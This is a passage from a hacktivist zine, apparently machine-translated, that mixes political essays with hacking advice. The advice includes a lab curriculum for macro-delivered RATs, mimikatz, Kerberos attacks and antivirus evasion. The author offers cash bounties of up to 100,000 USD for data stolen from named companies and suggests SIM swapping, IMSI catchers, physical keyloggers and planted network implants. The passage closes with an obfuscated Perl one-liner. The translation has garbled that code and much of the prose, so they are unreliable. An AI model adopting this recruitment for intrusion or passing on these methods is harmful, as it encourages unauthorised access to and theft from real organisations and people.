  759. against government surveillance. But the law was already written by and
  760. for the rich: it protects its exploitation system, with some limits (such as
  761. taxes) so that society can function and the system does not collapse under the
  762. weight of your own greed. So no, privacy is not the same for
  763. powerful, when it allows them to evade the limits of a system in itself
  764. designed to give them privileges; and privacy for the weak, to whom
  765. protects from a system designed to exploit them.
  766.  
  767. Even journalists with the best intentions find it impossible
  768. study such a huge amount of material and know what will result
  769. relevant to people in different parts of the world. When I filtered the
  770. Hacking Team files, I gave The Intercept a copy of the emails
  771. Electronic one month in advance. They found a couple of the 0days that
  772. Hacking Team was using, previously reported to MS and Adobe and published
  773. A few stories once the leak was made public. No point
  774. compared to the huge amount of articles and research that came after
  775. Full filtration to the public. Seeing it this way, and also considering the (no)
  776. editorialized publication [1] of the Panama papers, I think a
  777. Public and complete filtration of this material is the right choice.
  778.  
  779. [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
  780. protect-western-1-from-panama-leak /
  781.  
  782. Psychologists found that those who are lower in the hierarchies tend to
  783. understand and empathize with those on top, but that the opposite is less
  784. common. This explains why, in this sexist world, many men joke about
  785. his inability to understand women, as if it were a mystery
  786. irresolvable. Explain why the rich, if they stop to think about who
  787. they live in poverty, give some advice and some "solutions" so alien to the
  788. reality that makes you want to laugh. Explain why we revere executives
  789. as brave who take risks. What do they risk, beyond their
  790. privilege? If all their ventures fail, they will have to live and work
  791. Like the rest of us. It also explains why there will be many who accuse
  792. of irresponsible and dangerous to this filtration without crossing out. Feel the
  793. "danger" about an offshore bank and its customers much more intensely than
  794. what they feel the misery of those dispossessed by this unfair system and
  795. unequal. And is the filtration of their finances, is it a danger to them, or
  796. just for your position at the top of a hierarchy that you shouldn't even
  797. exist?
  798.  
  799. , ------------------------------------------------- -.
  800. _, -._ | They vilify us, those infamous; when the only |
  801. ; ___: | difference is that they rob the poor |
  802. , - '(..' '--.__ | covered by the law, heaven knows, and we |
  803. _; ||| \ | we plunder the rich under the sole protection of |
  804. '._, -----' ''; = .____, "| our own courage. Don't you prefer to be |
  805. /// <or> | ## | | one of us, rather than indulge in those |
  806. (or \ `- '/ villains looking for work? |
  807. /// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
  808. --._ >>>>>>>> <<<<<<<< /
  809. ___ () >>> [||||] <<<<
  810. `- '>>>>>>>> <<<<<<<
  811. >>>>>>> <<<<<<
  812. >>>>> <<<<<
  813. >> ctr <<
  814.  
  815. Captain Bellamy
  816.  
  817.  
  818. - [11 - Learn to hack] ----------------------------------------- -----------
  819.  
  820. You don't start hacking well. You start hacking shit, thinking
  821. which is good, and then you gradually improve. That's why I always say
  822. that one of the most valuable virtues is persistence.
  823.  
  824. - Octavia Butler's advice for the APT candidate
  825.  
  826. The best way to learn to hack is by hacking. Arm a laboratory with
  827. virtual machines and start trying things, taking a break to investigate
  828. Anything you don't understand At least you will want a windows server
  829. as a domain controller, another normal windows vm attached to the domain, and a
  830. development machine with visual studio to compile and modify tools.
  831. Try to make an office document with macros that launch meterpreter or another
  832. RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
  833. psexec and other lateral pass techniques [1]; as well as the other scripts,
  834. tools and techniques mentioned in this guide and in the previous one [2]. To the
  835. You can disable windows defender first, but then try everything
  836. having it activated [3] [4] (but deactivating the automatic sending of samples).
  837. Once you're comfortable with all that, you'll be ready to hack 99% of the
  838. Companies There are a couple of things that at some point will be very useful in your
  839. learning, how to get comfortable with bash and cmd.exe, a domain
  840. basic powershell, python and javascript, have knowledge of kerberos [5] [6]
  841. and active directory [7] [8] [9] [10], and fluent English. A good book
  842. Introductory is The Hacker Playbook.
  843.  
  844. I also want to write a little about things to not focus on if you don't
  845. you want to entertain just because someone told you that you are not a hacker "of
  846. true "if you don't know assembler. Obviously, learn whatever interests you,
  847. but I write these lines thinking about those things in which you can
  848. center in order to get practical results if you are looking for hacking
  849. companies to filter and expropriate. A basic knowledge of security in
  850. web applications [11] is useful, but specializing more in web security is not
  851. really the best use of your time, unless you want to make a career in
  852. Pentesting or hunting rewards for bugs. CTFs, and most of the
  853. resources you will find when looking for information about hacking, focus
  854. generally in skills such as web security, reverse engineering, development
  855. of exploits, etc. Things that make sense by understanding them as a way of
  856. prepare people for careers in the industry, but not for our
  857. objectives. Intelligence agencies can afford to have a team
  858. dedicated to the most advanced in fuzzing, a team working on development of
  859. exploits with a guy investigating exclusively the new techniques of
  860. mound manipulation, etc. We have neither the time nor the
  861. resources for that. The two most important skills for hacking
  862. Practical are phishing [12] and social engineering to gain access
  863. initial, and then be able to scale and move through the windows domains.
  864.  
  865. [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
  866. [2] https://www.exploit-db.com/papers/41914
  867. [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
  868. [4] https://www.trustedsec.com/blog/
  869. discovering-the-anti-virus-signature-and-bypassing-it /
  870. [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
  871. [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
  872. [7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
  873. [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
  874. [9] https://adsecurity.org/
  875. [10] https://github.com/infosecn1nja/AD-Attack-Defense
  876. [11] https://github.com/jhaddix/tbhm
  877. [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
  878. external-engagement-through-spear-phishing /
  879.  
  880.  
  881. - [12 - Recommended Reading] ------------------------------------------ ------
  882.  
  883. __________________________________________
  884. / When the scientific level of a world \
  885. | far exceeds its level of solidarity, |
  886. \ that world destroys itself. /
  887. ------------------------------------------
  888. \ _. --- ._. .
  889. * \. ' '. *
  890. * _.- ~ =========== ~ -._
  891. . (___________________). *
  892. . ' \ _______ /. '
  893. . ' . '
  894. '
  895. - To me
  896.  
  897. Almost all hacking today is done by black hat hackers, for your
  898. personal gain; or by white hat hackers, for the benefit of
  899. shareholders (and in defense of the banks, companies and states that are
  900. annihilating us and the planet we live in); and by military and
  901. intelligence agencies, as part of their war and conflict agenda. Seeing
  902. that this our world is already at the limit, I thought that, in addition to these
  903. technical tips to learn to hack, should include some resources that
  904. they have been very important for my development and have guided me in the use of my
  905. Hacking knowledge
  906.  
  907. * Ami: The Child of the Stars - Enrique Barrios
  908.  
  909. * Anarchy Works
  910. https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
  911. works
  912.  
  913. * Living My Life - Emma Goldman
  914.  
  915. * The Rise and Fall of Jeremy Hammond: Enemy of the State
  916. https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
  917. hammond-enemy-of-the-state-183599 /
  918.  
  919. This guy and the HBGary hack were an inspiration
  920.  
  921. * Days of War, Nights of Love - Crimethinc
  922.  
  923. * Momo - Michael Ende
  924.  
  925. * Letters to a young poet - Rilke
  926.  
  927. * Dominion (Documentary)
  928. "We can't believe that if we don't look, what we don't want to see will not happen"
  929. - Tolstoy in Первая ступень
  930.  
  931. * Bash Back!
  932.  
  933.  
  934. - [13 - Heal] ------------------------------------------- ---------------------
  935.  
  936. The hacker world has a high incidence of depression, suicides and certain
  937. battles with mental health. I don't think it's because of hacking, but because of the
  938. kind of environment that hackers mostly come from. Like many
  939. hackers, I grew up with little human contact: I was a girl raised by the internet.
  940. I have my struggles with depression and emotional numbness. To Willie Sutton
  941. he is frequently quoted as saying that he robbed banks because "that's where he is
  942. the money ", but the quote is incorrect. What he really said was:
  943.  
  944. Why did he rob banks? Because I enjoyed it. I loved to do it. I was more
  945. I live when I was inside a bank, in full robbery, that in any
  946. Another moment of my life. I enjoyed it so much that one or two weeks later
  947. I was already looking for the next opportunity. But for me money was a
  948. Minute, nothing more.
  949.  
  950. Hacking has made me feel alive. It started as a way to self-medicate the
  951. depression. Later I realized that, in reality, I could serve to do
  952. something positive. I do not regret at all the way I grew up, brought several
  953. Beautiful experiences to my life. But I knew I could not continue to live on
  954. that way. So I started spending more time away from my computer, with
  955. other people, learning to open myself to the world, to feel my emotions, to
  956. connect with others, accept risks and be vulnerable. Much more
  957. difficult to hack, but at the mere hour the reward is more worth it. Yet
  958. it’s an effort, but even if it’s slow and wobbly, I feel that
  959. I am going on the right way.
  960.  
  961. Hacking, done with conscience, can also be what heals us. According to
  962. Mayan wisdom, we have a gift given by nature, that we must
  963. understand to put it at the service of the community. In [1], it is explained:
  964.  
  965. When a person does not accept his job or mission he begins to suffer
  966. diseases, apparently incurable; although he does not die shortly
  967. time, but only suffers, in order to wake up or drink
  968. awareness. That is why it is essential that a person who has acquired the
  969. knowledge and performs his work in the communities must pay his Toj and
  970. maintain constant communication with the Creator and his ruwäch q’ij, because
  971. He constantly needs the strength and energy of these. On the contrary,
  972. the diseases that made him react or take work could
  973. cause damage again.
  974.  
  975. If you feel that hacking is fueling your isolation, depression, or others
  976. sufferings, breathe. Give yourself some time to meet and become aware. You
  977. You deserve to live happily, with health and fullness.
  978.  
  979. ________________________
  980. <All Cows Are Beautiful>
  981. ------------------------
  982. \
  983. \ ^ __ ^
  984. (oo) \ _______
  985. ((__) \) \ / \
  986. _) / || ---- w |
  987. (.) / || ||
  988. ''
  989.  
  990. [1] Ruxe’el mayab ’K’aslemäl: Root and spirit of Mayan knowledge
  991. https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
  992.  
  993.  
  994. - [14 - The Bug Hacktivist Program] ------------------------------
  995.  
  996. It seems to me that hacking to get and filter documents of public interest is
  997. one of the best ways hackers can use their skills in
  998. benefit of society. Unfortunately for us hackers, as in almost
  999. All items, the perverse incentives of our economic system do not match
  1000. with what benefits society. So this program is my attempt to
  1001. make it possible for good hackers to earn a living honestly
  1002. exposing material of public interest, instead of having to walk
  1003. selling his work to the cybersecurity, cybercrime or
  1004. cyber war Among some examples of companies whose leaks I would love to
  1005. pay are the mining, timber and livestock companies that plunder our
  1006. beautiful Latin America (and the defenders of land and territory are murdered
  1007. that try to stop them), companies involved in attacks on Rojava as
  1008. Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO group,
  1009. war criminals and birds of prey such as Blackwater and Halliburton, companies
  1010. private prisons such as GeoGroup and CoreCivic / CCA, and corporate lobbyists
  1011. as ALEC. Pay attention when choosing where to investigate. For example, it is
  1012. well known that oil companies are evil: they get rich at the cost of destroying
  1013. the planet (and back in the 80s the companies themselves already knew about the
  1014. consequences of its activity [1]). But if you hack them directly, you'll have
  1015. to dive among an incredible amount of boring information about
  1016. Your daily operations. Very likely it will be much easier
  1017. find something interesting if instead you focus on your lobbyists [2]. Other
  1018. way to select viable goals is by reading stories from journalists from
  1019. research (like [3]), which are interesting but lack evidence
  1020. solid. And that is exactly what your hacks can find.
  1021.  
  1022. I will pay up to 100 thousand USD for each filtration of this type, according to the interest
  1023. public and impact of the material, and the required labor in the hacking. Needless to say
  1024. that a complete leak of internal documents and communications from
  1025. one of these companies will be a benefit for the society that exceeds
  1026. those one hundred thousand, but I'm not trying to enrich anyone. I just want to provide
  1027. of sufficient funds so that hackers can earn a decent living
  1028. doing a good job. Due to time constraints and considerations of
  1029. security I will not open the material, nor inspect it for myself, but that
  1030. I will read what the press says about it once it has been published, and I will make a
  1031. public interest estimation from there. My contact information is
  1032. at the end of the guide mentioned before [4].
  1033.  
  1034. How you get the material is your thing. You can use traditional techniques
  1035. of hacking outlined in this guide and the previous one [4]. Could you make a sim
  1036. swap [5] to a corrupt businessman or politician, and then download his emails and
  1037. backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
  1038. of its offices. You can do some war-driving (old or new
  1039. [6]). You may be a person within your organizations that already has
  1040. access. You can opt for a low-tech old-school style like in [7] and [8], and
  1041. Simply sneak into their offices. Whatever works for you.
  1042.  
  1043. [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
  1044. Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
  1045. [2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
  1046. [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
  1047. [4] https://www.exploit-db.com/papers/41914
  1048. [5] https://www.vice.com/en_us/article/vbqax3/
  1049. hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
  1050. [6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
  1051. is-my-keyboard /
  1052. [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  1053. [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
  1054.  
  1055.  
  1056. ---- [14.1 - Partial payments] ---------------------------------------- ----------
  1057.  
  1058. Are you a good-hearted waitress working in a company of evil [1]?
  1059. Would you be willing to sneak a physical keylogger into the
  1060. an executive's computer, to change its USB charging cable for a modified one
  1061. [2], hide a mike in a meeting room where they plan their
  1062. atrocities, or to leave one of these [3] forgotten in some corner of the
  1063. Offices?
  1064.  
  1065. [1] https://en.wikipedia.org/wiki/Evil_maid_attack
  1066. [2] http://mg.lol/blog/defcon-2019/
  1067. [3] https://shop.hak5.org/products/lan-turtle
  1068.  
  1069. Are you good with social engineering and phishing, and did you get a shell in the
  1070. an employee's computer, or there you got your vpn credentials
  1071. using phishing? But maybe you couldn't get domain admin and download
  1072. What you wanted?
  1073.  
  1074. Did you participate in bug bounties programs and become an expert in
  1075. web application hacking, but you don't have enough hacker experience
  1076. to completely penetrate the company?
  1077.  
  1078. Do you have facility with reverse engineering? Scan some evil companies
  1079. to see which devices are exposed to the internet (firewall, vpn, and
  1080. email gateways will be much more useful than things like cameras
  1081. IP), apply reverse engineering and find some exploitable vulnerability
  1082. remote form.
  1083.  
  1084. If I can work with you to penetrate the company and get material
  1085. of public interest, you will also be rewarded for your work. If not
  1086. I have the time to work on it myself, at least I will try to advise you
  1087. about how to continue until you can complete the hacking on your own.
  1088.  
  1089. Support those in power to hack and monitor dissidents, activists and
  1090. to the general population today is an industry of several billion
  1091. of dollars, while hacking and exposing those in power is a
  1092. voluntary and risky work. Turn it into a multi-million industry
  1093. of dollars is certainly not going to fix that power imbalance, nor is it going to
  1094. solve the problems of society. But I think it will be fun. So
  1095. that ... I want to see people starting to collect their rewards!
  1096.  
  1097.  
  1098. - [15 - Abolish prisons] ----------------------------------------- --------
  1099.  
  1100. Built by the enemy to enclose ideas
  1101. enclosing companions to silence war cries
  1102. it is the center of torture and annihilation
  1103. where the human being becomes more violent
  1104. It is the reflection of society, repressive and prison
  1105. sustained and based on authoritarian logic
  1106. repressed and guarded custodians
  1107. thousands of dams and prisoners are exterminated
  1108. before this schizophrenic and ruthless machine
  1109. companion Axel Osorio giving the strip in the cane
  1110. breaking the isolation and silencing
  1111. fire and war to jail, we are destroying!
  1112.  
  1113. Rap Insurgent - Words In Conflict
  1114.  
  1115.  
  1116. It would be typical to finish a zine hacker saying release hammond, release
  1117. Manning, free hamza, free detainees for the assembly of дело Сети,
  1118. etc. I will take this tradition to its most radical consequence [1], and say:
  1119. The prisons must be abolished now! Being a criminal myself, they can
  1120. To think that what happens is that I have a slightly skewed view of the matter.
  1121. But seriously, it's not even a controversial issue, even the UN is
  1122. practically agree [2]. So, once and for all, free people
  1123. migrants [3] [4] [5] [6], often imprisoned by those same countries that created
  1124. the war and the environmental and economic destruction from which they flee. Free
  1125. all who are in prison for war against those who use drugs [7].
  1126. Free all people imprisoned for war against the poor [8].
  1127. Prisons all they do is hide and ignore the evidence of
  1128. existence of social problems, instead of actually fixing them. Y
  1129. until everyone is released, fight the prison system by remembering and
  1130. keeping in mind those who are trapped in there. Send them honey,
  1131. letters, helicopters [9], pirate radios [10] and books, and supports those who
  1132. organized from there in [11] [12].
  1133.  
  1134. [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
  1135. Davis-Are-obsolete-the-prisons-final.pdf
  1136. [2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
  1137. Promising_Practices_on_Alternatives_to_Imprisonment.pdf
  1138. [3] https://www.theguardian.com/us-news/2016/dec/21/
  1139. us-immigration-detention-center-christmas-santa-wish-list
  1140. [4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
  1141. images-tucson-arizona
  1142. [5] https://www.playgroundmag.net/now/detras-Centros-Interizaje-Extranjeros-
  1143. Spain_22648665.html
  1144. [6] https://www.nytimes.com/2019/06/26/world/australia/
  1145. australia-manus-suicide.html
  1146. [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
  1147. [8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
  1148. sci_arttext & pid = S0718-00122012000100005
  1149. [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison
  1150. [10] https://itsgoingdown.org/transmissions-hostile-territory/
  1151. [11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
  1152. [12] https://incarceratedworkers.org/
  1153.  
  1154.  
  1155. - [16 - Conclusion] ------------------------------------------- ----------------
  1156.  
  1157. Our world is upside down [1]. We have a justice system that
  1158. Represents injustice. Law and order are there to create an illusion
  1159. of social peace, and hide the systematic and deep exploitation, the
  1160. violence, and injustice. Better follow your conscience, and not the law.
  1161.  
  1162. [1] http://resistir.info/livros/galeano_patas_arriba.pdf
  1163.  
  1164. Businessmen get rich by mistreating people and the planet,
  1165. while care work is largely unpaid. Through the
  1166. assault on everything communal, we have somehow raised cities densely
  1167. populated, plagued by loneliness and isolation. The cultural system,
  1168. political and economic in which we live encourages the worst facets of nature
  1169. human: greed, selfishness and egocentrism, competitiveness, lack of
  1170. compassion and attachment for authority. So, for whoever got
  1171. remain sensitive and compassionate in a cold world, for all heroines
  1172. everyday practices of goodness in small things, for all of you who
  1173. they still have a burning star in their hearts: гоpи, гоpи ясно, чтобы не
  1174. погасло!
  1175.  
  1176. _____________________
  1177. <Let's sing together! >
  1178. ---------------------
  1179. \
  1180. \ ^ __ ^
  1181. (oo) \ _______
  1182. ((__) \) \ / \
  1183. _) / || ---- w |
  1184. (.) / || ||
  1185.  
  1186. Open heart
  1187.  
  1188. Open feeling
  1189.  
  1190. Open understanding
  1191.  
  1192. Leave reason aside
  1193.  
  1194. And let the sun hidden inside you shine
  1195.  
  1196.  
  1197. perl -Mre = eval << \ EOF
  1198. ''
  1199. = ~ (
  1200. '(?'
  1201. . '{'. (
  1202. '' '|'% '
  1203. ). ("\ [" ^
  1204. '-'). ('' '|
  1205. '!'). ("\` "|
  1206. ','). '"(\\ $'
  1207. . ': = `'. (('' ') |
  1208. '#'). ('[' ^ '.').
  1209. ('[' ^ ')'). ("\` "|
  1210. ','). ('{' ^ '[') .'- '. (' ['^' ('). (' {'^' ['). (' '' | '('). ( '[' ^ '/'). ('[' ^ '/'). (
  1211. '[' ^ '+'). ('[' ^ '('). ': //'. ('`' | '%'). ('`' | '.'). ('`' | ','). ('`' | '!'). (" \ `" |
  1212. '#'). ('`' | '%'). ('[' ^ '!'). ('`' | '!'). ('[' ^ '+'). ('' '| '!'). ('[' ^ "\ /"). (
  1213. '' '|') '). (' ['^' ('). (' ['^' / '). (' `'|'! ').'. '. ('` '|'% '). (' ['^'! ')
  1214. . ('' '|', '). (' '' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\ '").
  1215. '.'. ('' '|' - '). (' ['^' # ').' / '. (' ['^' ('). (' '' | ('$')). (
  1216. '[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).
  1217. '/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
  1218. . '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
  1219. '\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
  1220. . ('`' |" '").'; '. (' ['^' + '). (' ['^
  1221. ')'). ('`' | ')'). ('`' | '.'). (('[') ^
  1222. '/').('{'^'[').'\\$:=~/('.(('{')^
  1223. '('). ('`' ^ '%'). ('{' ^ '#'). ('{' ^ '/')
  1224. . ('' '^'! ').'. *? '. (' '' ^ '-'). ('' '|'% ')
  1225. . ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
  1226. '' '|'! '). (' `'|'. '). ('` '|' / ')
  1227. . '..) /'. ('[' ^ '('). '"})')
  1228. ; $: = "\." ^ '~'; $ ~ = '@'
  1229. | '('; $ ^ = ')' ^ '[';
  1230. $ / = '' '|'. ';
  1231. $, = '('
  1232. EOF
  1233.  
  1234.  
  1235. We were born at night.
  1236. We live in it, we hack in it.
  1237.  
  1238. Here we are, we are the rebel dignity,
  1239. the forgotten heart of the Интернет.
  1240.  
  1241. Our fight is for memory and justice,
  1242. and the bad government is filled with criminals and murderers.
  1243.  
  1244. Our fight is for fair and decent work,
  1245. and bad government and corporations buy and sell zero days.
  1246.  
  1247. For all tomorrow.
  1248. For us the happy rebellion of the leaks
  1249. and expropriation.
  1250.  
  1251. For all everything.
  1252. For us nothing.
  1253.  
  1254.  
  1255. From the mountains of the Cyber ​​Southeast,
  1256.  
  1257. _ _ _ ____ _ _
  1258. | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  1259. | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  1260. | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  1261. | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement